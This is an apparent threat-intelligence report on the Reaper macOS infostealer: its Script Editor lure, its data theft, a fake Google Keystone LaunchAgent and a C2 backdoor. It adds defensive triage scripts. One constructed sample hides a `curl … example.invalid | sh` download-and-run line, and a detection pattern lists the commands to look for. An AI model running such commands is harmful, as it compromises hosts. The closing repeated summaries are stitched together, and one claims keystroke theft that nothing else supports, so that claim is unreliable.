Reaper is a name used in several distinct malware contexts, but the most prominent current usage refers to a macOS infostealer variant in the SHub family. SentinelOne describes Reaper as a fresh SHub variant that targets macOS users through fake WeChat and Miro installer pages hosted on typo-squatted infrastructure, including mlcrosoft[.]co[.]com. The lure chain impersonates Apple, Microsoft, and Google: the fake download page invokes the applescript:// URL scheme to open Script Editor with a pre-populated malicious AppleScript, and the functional command is pushed below the visible area of the editor window with whitespace padding and ASCII art, so the victim sees only a benign-looking header before clicking Run. This Script Editor flow is described as sidestepping the macOS Tahoe 26.4 protections that were aimed at the earlier Terminal-based SHub delivery technique.
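The applescript:// lure described above, as an added triage example that is not code from the SentinelOne report or from the Reaper lure pages: a POSIX shell script that decodes the script parameter of such a URL (as it would appear in proxy or browser history logs) and lists only the statements that actually do something, numbered by their original line so the distance between the decoy header and the hidden payload is visible. It assumes the Script Editor URL layout applescript://com.apple.scripteditor?action=new&script=<percent-encoded text>; the sample URL, its padding, and the example.invalid command are constructed for this illustration.

```shell
#!/bin/sh
# Added example (not code from the SentinelOne report or from the Reaper lure
# pages): decode an applescript:// lure URL and list the statements that sit
# below the decoy header. The URL layout
#   applescript://com.apple.scripteditor?action=new&script=<percent-encoded text>
# is the Script Editor scheme as understood here; the sample URL is constructed.

# Percent-decode one argument with POSIX awk (%XX -> byte, '+' -> space).
urldecode() {
  printf '%s\n' "$1" | awk '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    {
      out = ""; n = length($0)
      for (i = 1; i <= n; i++) {
        c = substr($0, i, 1)
        if (c == "%" && i + 2 <= n) {
          out = out sprintf("%c", hexval(substr($0, i + 1, 1)) * 16 + hexval(substr($0, i + 2, 1)))
          i += 2
        } else if (c == "+") {
          out = out " "
        } else {
          out = out c
        }
      }
      print out
    }'
}

# Pull the script parameter out of an applescript:// URL; fails on other URLs.
lure_script() {
  enc=$(printf '%s' "$1" | sed -n 's/^applescript:\/\/com\.apple\.scripteditor?action=new&script=//p')
  [ -n "$enc" ] || return 1
  urldecode "$enc"
}

# Keep only real statements, numbered by their original line: drop blank lines,
# AppleScript comments (-- or #) and lines with no alphanumerics (ASCII art).
functional_lines() {
  grep -n '.' | grep -vE '^[0-9]+:[[:space:]]*(--|#)' | grep -E '^[0-9]+:.*[[:alnum:]]'
}

# Of those, the statements worth reading first.
dangerous_statements() {
  functional_lines | grep -E 'do shell script|curl|base64|osascript|/bin/(ba|z)?sh|password'
}

# Constructed lure: two comment lines and a harmless dialog fill the editor
# window; 119 blank lines and an ASCII-art bar push the payload out of view.
build_sample_url() {
  u='applescript://com.apple.scripteditor?action=new&script='
  u="${u}--%20Apple%20Security%20Update%0A--%20Click%20Run%20to%20finish%20installing%0A"
  u="${u}display%20dialog%20%22Verifying%20installer...%22"
  i=0
  while [ "$i" -lt 120 ]; do u="${u}%0A"; i=$((i + 1)); done
  u="${u}%2F%3D%3D%3D%3D%3D%3D%3D%3D%5C%0A"
  u="${u}do%20shell%20script%20%22curl%20-fsSL%20https%3A%2F%2Fexample.invalid%2Fx%20%7C%20sh%22"
  printf '%s' "$u"
}

# With the constructed sample, the only statements are on lines 3 and 124.
lure_script "$(build_sample_url)" | functional_lines
```

The line number of the first dangerous statement relative to the last visible one is the tell: in the reported campaign the victim's window shows the header and nothing else, so anything that `dangerous_statements` reports from deep in the padding is what the Run button will execute. Note that the exact URL layout used by the campaign is not quoted on this page; adjust the `sed` prefix in `lure_script` if captured URLs differ.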
Once executed, Reaper displays a fake Apple security update prompt to capture the user’s macOS login password, then steals browser data (Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, and Orion, including their extensions), password manager contents, macOS Keychain and iCloud account data, Telegram session data, developer-related files, and cryptocurrency wallet information. An AMOS-style FileGrabber module searches Desktop and Documents for business- or finance-relevant files such as .docx, .wallet, .key, .json, .csv, .xls, and .rdp, stages them under /tmp/shub_<random>/, splits them into 10 MB chunks, and uploads them with curl. Reported exfiltration infrastructure includes hebsbsbzjsjshduxbs[.]xyz, with chunks posted to a /gate/chunk endpoint. Reaper also targets browser extensions and desktop wallet applications including MetaMask, Phantom, Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite; in some cases it replaces wallet application files such as app.asar to enable continued theft after the initial run.
For persistence, Reaper creates a fake Google Software Update path at ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate, which holds a base64-decoded bash script rather than a real updater binary, and registers a LaunchAgent at ~/Library/LaunchAgents/com.google.keystone.agent.plist. The plist name and label are identical to those of Google’s legitimate Keystone updater agent, which Chrome installs in the same LaunchAgents directory, so triage has to key on the program path (the fake GoogleUpdate.app under Application Support, executed via a shell) rather than on the file name alone. The LaunchAgent runs the script every 60 seconds, sending system details to a command-and-control /api/bot/heartbeat endpoint. If the server returns a code payload, the script decodes it, writes it to a hidden temporary file such as /tmp/.c.sh, executes it with the current user’s privileges, and deletes it, giving the operator a persistent remote execution backdoor that runs as the victim user with no further interaction. The anti-analysis behavior described is on the web side of the chain: the lure page uses debugger loops, console tampering, and replacement of the page content with a Russian-language access denied message if DevTools are opened. The stealer itself checks for Russian-language keyboard input settings and exits on likely CIS-region systems.
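A triage check for the persistence artifacts above, added here and not part of the original reporting. It inspects a LaunchAgent plist for the three reported traits (the fake GoogleUpdate path under Application Support, a shell interpreter as the program, a 60-second StartInterval) and lists the reported /tmp staging paths without touching them. Both plists are constructed samples: the first is modelled on the reported artifact, whose exact contents the page does not reproduce, and the second on the legitimate Keystone agent layout under ~/Library/Google/GoogleSoftwareUpdate/, which is stated from general knowledge of Chrome’s updater rather than from the page and should be treated as an assumption.

```shell
#!/bin/sh
# Added example, not code from the original report: triage a LaunchAgent plist
# and the /tmp locations for the Reaper persistence pattern described above.
# Uses only tr/grep/sed so it runs without plutil. Both plists are constructed:
# the first is modelled on the reported artifact, the second on the legitimate
# Keystone agent that shares the same label (its exact contents are an assumption).

MALICIOUS_PLIST=$(mktemp)
cat > "$MALICIOUS_PLIST" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/bash</string>
    <string>/Users/victim/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>60</integer>
</dict></plist>
EOF

BENIGN_PLIST=$(mktemp)
cat > "$BENIGN_PLIST" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Users/victim/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateAgent</string>
    <string>-runMode</string><string>ifneeded</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>
EOF

# Print "[!]" findings for a plist; exit 0 when at least two of the three
# reported traits line up (path, shell interpreter, 60-second StartInterval).
# The label alone proves nothing: Chrome's real Keystone agent uses it too.
triage_plist() {
  flat=$(tr -d '\n' < "$1")
  hits=0
  if printf '%s' "$flat" | grep -q 'Application Support/Google/GoogleUpdate\.app/Contents/MacOS/GoogleUpdate'; then
    echo "[!] program is the reported fake GoogleUpdate path (real Keystone lives under ~/Library/Google/GoogleSoftwareUpdate/)"
    hits=$((hits + 1))
  fi
  if printf '%s' "$flat" | grep -qE '<array>[[:space:]]*<string>/bin/(ba|z)?sh</string>'; then
    echo "[!] ProgramArguments starts with a shell interpreter: the agent runs a script, not a Mach-O"
    hits=$((hits + 1))
  fi
  interval=$(printf '%s' "$flat" | sed -n 's:.*<key>StartInterval</key>[[:space:]]*<integer>\([0-9]*\)</integer>.*:\1:p')
  if [ -n "$interval" ] && [ "$interval" -le 60 ]; then
    echo "[!] StartInterval ${interval}s matches the reported heartbeat cadence"
    hits=$((hits + 1))
  fi
  echo "score: $hits/3"
  [ "$hits" -ge 2 ]
}

# The reported staging directory and dropped command script; no output is the
# clean case. Files are listed, never removed, so evidence survives triage.
staging_artifacts() {
  ls -ld /tmp/shub_* /tmp/.c.sh 2>/dev/null
  return 0
}

# On a real host: triage_plist "$HOME/Library/LaunchAgents/com.google.keystone.agent.plist"
triage_plist "$MALICIOUS_PLIST"           # three findings, exit 0
triage_plist "$BENIGN_PLIST" || true      # score 0/3, exit 1
staging_artifacts
```

On macOS the LaunchAgent may be stored as a binary plist; convert a copy with `plutil -convert xml1 -o /tmp/agent.xml <file>` before running `triage_plist` on it. The three traits are scored rather than matched individually because the path check alone would miss a rebuilt variant that changes the drop directory, while a low StartInterval alone is common in legitimate agents.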
The name Reaper also appears in two unrelated contexts: the historical program written by Ray Tomlinson to remove the Creeper worm, often described as the first antivirus, and a separate IoT botnet (thingbot) discussed in connection with Netgear router exploitation. The detailed malware reporting here, however, concerns the SHub macOS infostealer variant.
The updated build, now called Reaper, spreads through fake websites that impersonate popular software... It uses a fake webpage to silently open your Mac’s Script Editor, pre-loaded with malicious code, and all a user has to do is click one button to unknowingly launch the infection.
Before finishing its initial run, Reaper establishes persistence using a directory structure built to mimic Google’s legitimate Keystone update service. It places a base64-decoded bash script named GoogleUpdate... then registers a LaunchAgent using a property list named com.google.keystone.agent.plist. This causes the script to execute silently every 60 seconds in the background.
Reaper drops a highly persistent User LaunchAgent script onto the host... The native LaunchAgent configuration is designed to trigger this GoogleUpdate beacon script automatically every 60 seconds, logging system details and checking in with the C2 server’s /api/bot/heartbeat endpoint.
the fake websites use a specific internet link format (applescript://) to automatically open the built-in macOS Script Editor app. The hackers hide the malicious code inside the app by using extensive ASCII art and arbitrary whitespace injection to obfuscate the functional script sequences below the visible scroll boundary of the graphical user interface.
the campaign distributing an updated version of SHub Stealer under the build tag Reaper... attackers used fake download pages for popular apps such as WeChat and Miro to target victims.
If the server returns a “code” payload, the script decodes it, writes it to /tmp/.c.sh, runs it with the current user’s privileges, and then deletes it.
Once the script runs, it displays a fake Apple security update message to trick the user into typing in their system password.
Earlier builds could already steal browser data, macOS Keychains, iCloud account data, and Telegram session information. The new version goes much further, now targeting Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, and Orion browsers, along with their extensions.
The malware also carries an AMOS-style Filegrabber that hunts through Desktop and Documents folders for valuable files, including .docx, .wallet, .key, .csv, .xls, and .json formats.
Files are staged in /tmp/shub_random/ before being split into 10MB chunks and uploaded to the attacker’s server via curl.
A macOS SHub variant that uses fake WeChat and Miro installers delivered via a typo-squatted Microsoft-themed domain, executes via AppleScript/Script Editor, establishes persistence through a fake Google Keystone LaunchAgent, steals files, browser credentials, developer keystrokes, and cryptocurrency wallet data, and maintains a persistent remote execution channel through heartbeat-delivered shell scripts.
A macOS infostealer variant that spoofs trusted brands, steals credentials, password manager data, browser data, crypto wallet data, developer files, Keychain/iCloud and Telegram data, grabs business/financial documents, injects cryptocurrency wallet applications for continued theft, and establishes persistence via a GoogleUpdate-themed LaunchAgent backdoor that can beacon to C2 and execute remote code.
macOS infostealer variant that uses fake installers and AppleScript-based social engineering to steal browser data, password manager data, cryptocurrency wallet data, Keychain and iCloud information, Telegram session data, and selected files, while also establishing LaunchAgent-based persistence and a remote code execution backdoor.
A macOS infostealer variant that masquerades as a critical system update or workplace software, steals browser data, password manager contents, cryptocurrency wallet data, and selected documents, replaces wallet apps with trojanized versions, and establishes persistence via a hidden backdoor that polls a C2 server for further commands.